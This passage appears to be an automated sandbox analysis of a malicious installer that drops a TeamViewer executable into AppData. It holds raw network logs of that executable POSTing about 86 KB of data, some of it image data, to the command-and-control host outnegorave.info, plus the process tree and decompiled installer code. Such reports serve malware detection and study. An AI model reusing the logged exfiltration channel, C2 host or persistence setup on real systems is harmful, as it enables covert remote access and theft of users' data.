                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x887YJH4ElMCRx5jXS5zp7w2i9CCz2a7gNC3SmSP0jfXvX1CBsLZHCBBCZCuGLC7llR1s1BULe1hls%2BFVNabz8eMo77mRp3szhth%2BuRkzXPnYaiqdhll3KvKSXGGvgzu6mP6"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1be891a6a4e86-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:09:08 UTC176INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      2192.168.2.649839172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2021-09-15 12:10:08 UTC176OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 86397
                                                                                                                      Content-Type: multipart/form-data; boundary=--------1750076427
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2021-09-15 12:10:08 UTC176OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 35 30 30 37 36 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------1750076427Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                      2021-09-15 12:10:08 UTC176OUTData Raw: b3 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 e6 af 4a 6b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 f0 0e 3b 85 19 5a 1e 56 7d e2 9e 04 9a ec a4 7b 68 07 48 47 6c fb 65 62 4f f6 d5 8b 9a f7 cd c9 c4 1a a0 86 08 4a 0b d5 08 f4 be 62 08 d6 15 e7 ce 36 99 fc 4a d9 1a af a3 d2 9e 3b e2 b9 24 26 9c c4 65 1f a7 f4 c8 59 9d b6 d1 6d a8 b8 c6 f0 2d fc 05 23 22 ba b8
                                                                                                                      Data Ascii: .(&<c&(yPNJk^;ZV}{hHGlebOJb6J;$&eYm-#"
                                                                                                                      2021-09-15 12:10:08 UTC177OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                      2021-09-15 12:10:08 UTC193OUTData Raw: 45 14 00 b4 94 b4 50 02 51 8a 51 45 00 47 4b 40 ab 5a 7d b2 5c ce c9 21 60 02 e7 e5 fa 8a 23 17 27 64 12 92 8a bb 2a 8a 5a d9 fe c8 b7 fe fc bf 98 ff 00 0a 3f b2 6d ff 00 bf 2f e6 3f c2 b6 fa ad 43 0f ad 53 31 a8 ad af ec 9b 7f ef cb f9 8f f0 a3 fb 26 df fb f2 fe 63 fc 29 fd 5a a0 7d 6a 99 8b 46 2b 67 fb 26 df fb f2 fe 63 fc 2a b5 fd 8c 56 d0 2b c6 ce 49 6c 7c c4 7a 1a 99 61 e7 15 76 54 71 10 93 b2 33 b1 46 29 68 35 81 b8 da 29 68 a0 04 a2 96 8c 52 b0 09 45 2e 29 31 45 86 14 51 8a 28 b0 05 14 51 40 05 2d 25 68 e9 da 1e a9 aa 42 d2 e9 f6 6f 3a 23 6d 62 a4 70 7a fa d0 dd b7 0b 5c cf a4 ad cf f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 fe 11 0f 10 ff 00 d0 2a 7f d3 fc 68 e6 8f 71 f2 be c6 1d 15 7b 50 d1 f5 1d 31 43 5f 5a 49 08 63 80 5b 1d 7a e3 8f ad 52 a6 9d c4
                                                                                                                      Data Ascii: EPQQEGK@Z}\!`#'d*Z?m/?CS1&c)Z}jF+g&c*V+Il|zavTq3F)h5)hRE.)1EQ(Q@-%hBo:#mbpz\D<C@O*hq{P1C_ZIc[zR
                                                                                                                      2021-09-15 12:10:08 UTC208OUTData Raw: da 0a 28 a2 80 0a 28 a5 44 79 1c 24 6a cc c7 a0 51 92 69 80 94 53 a4 8e 48 9f 64 a8 c8 c3 b3 0c 1a 6d 00 14 51 45 20 0a 28 a2 80 0a 28 a2 98 05 14 51 40 05 14 51 40 05 2d 25 28 a0 02 8a 28 a0 41 4b 49 4b 4c 02 96 92 94 50 02 d2 8a 05 2d 52 44 b6 2e 28 c5 2d 14 ec 48 d3 4d a7 1a 43 49 94 84 a2 8a 29 00 51 45 14 00 b4 b4 94 53 01 68 a2 92 81 0b de 96 92 96 80 0a 28 a2 98 0b 45 25 14 00 51 45 14 c0 51 4b 49 4b 40 82 8a 28 a0 05 a2 8a 29 88 29 68 a2 98 85 a5 14 94 b4 c4 2d 14 94 50 03 85 2d 34 52 d3 24 5a 5a 4a 5a 60 28 a5 cd 36 96 9a 13 1d 4b 4d 14 a2 a9 12 c7 52 d3 69 69 88 75 14 94 53 10 e0 69 c0 d3 29 45 3b 89 a1 d4 b4 da 75 34 48 a2 96 93 34 53 10 ea 75 33 34 a0 d3 42 68 75 19 a4 cd 14 c4 38 1a 76 69 94 b5 49 89 a1 f9 a2 9b 4b 9a 77 26 c3 c1 a5 cd 32 96
                                                                                                                      Data Ascii: ((Dy$jQiSHdmQE ((Q@Q@-%((AKIKLP-RD.(-HMCI)QESh(E%QEQKIK@())h-P-4R$ZZJZ`(6KMRiiuSi)E;u4H4Su34Bhu8viIKw&2
                                                                                                                      2021-09-15 12:10:08 UTC224OUTData Raw: 7f c7 ca 7f b9 59 46 b3 c3 fc 08 8c 57 f1 18 99 a5 a4 a3 e9 5b 9c c2 e6 8a 4a 5e 68 04 28 34 e1 4d c5 38 54 96 85 a7 0a 65 3c 52 65 21 68 a2 8a 45 21 c2 9c 29 a3 8a 70 15 2c b4 38 53 85 20 14 ec 54 b3 44 2d 2d 26 29 40 a4 ca 43 85 38 53 40 a7 0a 86 52 1c 29 d9 a6 0a 78 a4 cb 42 8a 75 34 53 aa 59 48 70 ae 1b c6 80 0b 8b 6c 7f 75 bf 9d 77 03 bd 70 de 34 ff 00 8f 9b 7f f7 1b f9 d5 52 dc 53 38 4a 4d a0 d3 b1 45 63 63 ae e3 76 2d 1b 17 d2 9d 45 16 41 76 2c 45 a1 95 25 85 de 39 10 ee 57 43 82 a7 d4 11 4b 23 3c d2 bc b3 c8 f2 c8 e7 2c ee c4 96 3e a4 9e b4 94 51 64 17 63 44 6a 3b 52 84 5f 4a 5a 5a 76 42 bb 0a 5a 4a 5a 62 1a 51 5b 92 28 31 a9 18 c5 3a 8a 2c 82 ec 67 94 be 94 bb 17 d2 9f 49 47 2a 0b b1 be 5a e7 38 a0 22 8e 82 9d 45 16 41 76 20 50 06 07 4a 40 8a 0e
                                                                                                                      Data Ascii: YFW[J^h(4M8Te<Re!hE!)p,8S TD--&)@C8S@R)xBu4SYHpluwp4RS8JMEccv-EAv,E%9WCK#<,>QdcDj;R_JZZvBZJZbQ[(1:,gIG*Z8"EAv PJ@
                                                                                                                      2021-09-15 12:10:08 UTC240OUTData Raw: 32 e5 ee a2 6f e1 8f ed 10 e6 e6 32 55 67 0f c9 8f b2 b0 c7 24 76 39 e9 c7 a6 2a 52 52 d3 8c 54 55 90 a5 26 f5 61 5a 3a 76 a1 6b 69 67 77 6f 3d a5 c4 8d 72 02 34 b0 dc 2c 64 20 e4 af 28 dc 13 8c fd 07 be 73 a8 a6 d5 d5 84 9d 9d cd 15 be b1 36 ff 00 64 9a c2 e1 ed 63 90 c9 06 db 90 b2 c6 48 01 81 6d 84 30 38 07 ee 8f ad 58 bc d5 ec 65 93 64 76 93 4b 68 cf 03 fd 9d c8 41 18 8d 5c 08 c1 f9 b7 03 bb 25 8e 09 e7 81 9e 31 e8 a9 70 4c a5 36 8d 55 d7 e6 79 63 b8 bc b7 f3 ee 63 13 20 90 3e df 92 45 61 b7 18 e8 a5 89 1f 88 f4 c2 47 af 4e bf 63 0f 6e ad f6 68 64 8d 88 6c 19 59 a3 31 86 3c 76 5d a3 f0 f7 ac ba 28 f6 51 0f 69 22 eb ea 72 b6 89 6f a6 88 82 98 64 dd e7 03 cb 28 24 aa e3 d8 b3 1f c7 da af 43 ab e9 cd 7b 2d e4 f6 37 10 5d cc ad 99 e1 90 3a 46 ec 39 75 88
                                                                                                                      Data Ascii: 2o2Ug$v9*RRTU&aZ:vkigwo=r4,d (s6dcHm08XedvKhA\%1pL6Uycc >EaGNcnhdlY1<v](Qi"rod($C{-7]:F9u
                                                                                                                      2021-09-15 12:10:08 UTC256OUTData Raw: 17 91 c5 a8 4b 6e b6 8c 22 5c 46 84 bb 6c 0c 59 b2 0f 1c 8e 06 3a 1f c2 cc 17 57 57 7a 0a 5d db a2 7d aa 5b 7d e8 a7 ee ef 2b 91 f8 66 8e 97 0e a5 fa 2b 9c 6d 4a e6 3b 78 e0 86 6b c9 ee a5 b8 11 3a c9 14 4b 2c 3f 29 63 8f ba 87 20 70 79 1c f7 e9 53 0b ab e8 ac de 3b b6 bc 8a 49 26 09 6e 42 44 d3 48 31 92 30 b9 41 d0 f2 70 31 f9 d0 06 ed 15 ce c5 7d a8 4b 6e b0 99 a4 8a 51 7f f6 72 f2 24 65 f6 14 dd c8 5c ae 79 ed c7 03 de ad c0 6f 2f 2f 2e 63 5b f9 62 4b 37 58 86 11 09 94 ed 0c 59 b2 bd f3 8f 97 1d ff 00 03 fa fe be f0 35 52 44 90 13 1b ab 05 25 4e d3 9c 11 d4 7d 69 d5 cd 47 25 d5 a4 73 5d a5 d1 11 0d 48 c6 60 08 bb 59 5a 4d a7 24 8c e7 9c 8c 10 38 e9 5d 2d 0b 6b 87 50 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2
                                                                                                                      Data Ascii: Kn"\FlY:WWz]}[}+f+mJ;xk:K,?)c pyS;I&nBDH10Ap1}KnQr$e\yo//.c[bK7XY5RD%N}iG%s]H`YZM$8]-kP(((((((
                                                                                                                      2021-09-15 12:10:08 UTC261OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 35 30 30 37 36 34 32 37 2d 2d 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------1750076427--
                                                                                                                      2021-09-15 12:10:18 UTC261INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:10:18 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=f4b2fe0e693337d31e5a414d614f56856b1c8f2532f060351f24f1a8e78bef0f; expires=Thu, 15-Sep-2022 12:10:08 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HEO3VrQh%2FvsTQW6Ij0CiQ7HlUyvWT4dITU60tYAYAZNimIVLNAITa%2F0OfXSbs2EwB%2FgZldrqHYIcjCi1UnLEk%2Ff8e75Y8OV5XkBDyWgkrRa1n%2FGmG9sOa5gg7ewy%2FQkW21zQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1c00cbaeed729-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:10:18 UTC262INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      Analysis Process: svchost.exe PID: 6400 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:07:31
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: 77Etc0bR2v.exe PID: 6880 Parent PID: 1316

                                                                                                                      General

                                                                                                                      Start time:14:07:32
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\Desktop\77Etc0bR2v.exe'
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1828192 bytes
                                                                                                                      MD5 hash:E71E3B995477081569ED357E4D403666
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: TeamViewer.exe PID: 6952 Parent PID: 6880

                                                                                                                      General

                                                                                                                      Start time:14:07:35
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: TeamViewer.exe PID: 5424 Parent PID: 4920

                                                                                                                      General

                                                                                                                      Start time:14:07:47
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: svchost.exe PID: 5512 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:07:55
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: svchost.exe PID: 5568 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:00
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
                                                                                                                      Imagebase:0x890000
                                                                                                                      File size:44520 bytes
                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: svchost.exe PID: 3216 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:09
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: TeamViewer.exe PID: 1972 Parent PID: 3440

                                                                                                                      General

                                                                                                                      Start time:14:08:11
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: TeamViewer.exe PID: 5724 Parent PID: 3440

                                                                                                                      General

                                                                                                                      Start time:14:08:19
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: TeamViewer.exe PID: 6052 Parent PID: 4920

                                                                                                                      General

                                                                                                                      Start time:14:08:20
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: svchost.exe PID: 4928 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:19
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: TeamViewer.exe PID: 6704 Parent PID: 4920

                                                                                                                      General

                                                                                                                      Start time:14:08:27
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Chronological Activities

                                                                                                                      Analysis Process: svchost.exe PID: 5860 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:49
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Chronological Activities

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                      Reset < >

                                                                                                                        Analysis Process: 77Etc0bR2v.exe PID: 6880 Parent PID: 1316 77Etc0bR2v.exeCOMMON

                                                                                                                        Executed Functions

                                                                                                                        Function 0040323C, Relevance: 70.3, APIs: 24, Strings: 16, Instructions: 270filestringcomCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			_entry_() {
				struct _SHFILEINFO _v360;
				char _v372;
				struct _SECURITY_ATTRIBUTES* _v376;
				int _v380;
				CHAR* _v384;
				CHAR* _v388;
				int _v392;
				intOrPtr _v396;
				struct _SECURITY_ATTRIBUTES* _v404;
				struct _SECURITY_ATTRIBUTES* _v412;
				void* _v428;
				intOrPtr _t36;
				CHAR* _t41;
				char* _t44;
				signed int _t46;
				void* _t50;
				int _t52;
				signed int _t54;
				signed int _t57;
				int _t58;
				signed int _t62;
				void* _t80;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				 *0x407030();
				SetErrorMode(0x8001); // executed
				_t36 =  *0x40727c(0); // executed
				 *0x423f58 = _t36;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfo(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t41 = GetCommandLineA();
				_t96 = "\"C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe\" ";
				E00405B66(_t96, _t41);
				 *0x423ea0 = GetModuleHandleA(0);
				_t44 = _t96;
				if("\"C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe\" " == 0x22) {
					_v384 = 0x22;
					_t44 =  &M00429001;
				}
				_t46 = CharNextA(E00405684(_t44, _v384));
				_v384 = _t46;
				while(1) {
					_t91 =  *_t46;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t46 - 0x22;
						_v384 = 0x20;
						if( *_t46 == 0x22) {
							_t46 = _t46 + 1;
							__eflags = _t46;
							_v384 = 0x22;
						}
						__eflags =  *_t46 - 0x2f;
						if( *_t46 != 0x2f) {
							L15:
							_t46 = E00405684(_t46, _v384);
							__eflags =  *_t46 - 0x22;
							if(__eflags == 0) {
								_t46 = _t46 + 1;
								__eflags = _t46;
							}
							continue;
						} else {
							_t46 = _t46 + 1;
							__eflags =  *_t46 - 0x53;
							if( *_t46 == 0x53) {
								__eflags = ( *(_t46 + 1) | 0x00000020) - 0x20;
								if(( *(_t46 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t46 - 0x4352434e;
							if( *_t46 == 0x4352434e) {
								__eflags = ( *(_t46 + 4) | 0x00000020) - 0x20;
								if(( *(_t46 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t46 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t46 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t46 - 2)) = 0;
								__eflags = _t46 + 2;
								E00405B66(0x429400, _t46 + 2);
								L20:
								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t50 = E00403208(_t109);
								_t110 = _t50;
								if(_t50 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t52 = E00402C72(_t111, _t99); // executed
									_v392 = _t52;
									if(_t52 != 0) {
										L32:
										ExitProcess(); // executed
										 *0x407280(); // executed
										if(_v384 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t57 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t57;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t62 =  *_t106(GetCurrentProcess(), 0x28,  &_v372);
															__eflags = _t62;
															if(_t62 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v376);
																_v392 = 1;
																_v380 = 2;
																 *_t97(_v396, 0,  &_v392, 0, 0, 0);
															}
														}
													}
												}
												_t58 = ExitWindowsEx(2, 0);
												__eflags = _t58;
												if(_t58 == 0) {
													E0040140B(9);
												}
											}
											_t54 =  *0x423f4c;
											__eflags = _t54 - 0xffffffff;
											if(_t54 != 0xffffffff) {
												_v376 = _t54;
											}
											ExitProcess(_v376);
										}
										E00405427(_v384, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v380 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v388 = "Error launching installer";
									if(_t103 < _t96) {
										_push("~nsu.tmp");
										_push(_t105);
										L00405B82();
										_push("C:\\Users\\engineer\\Desktop");
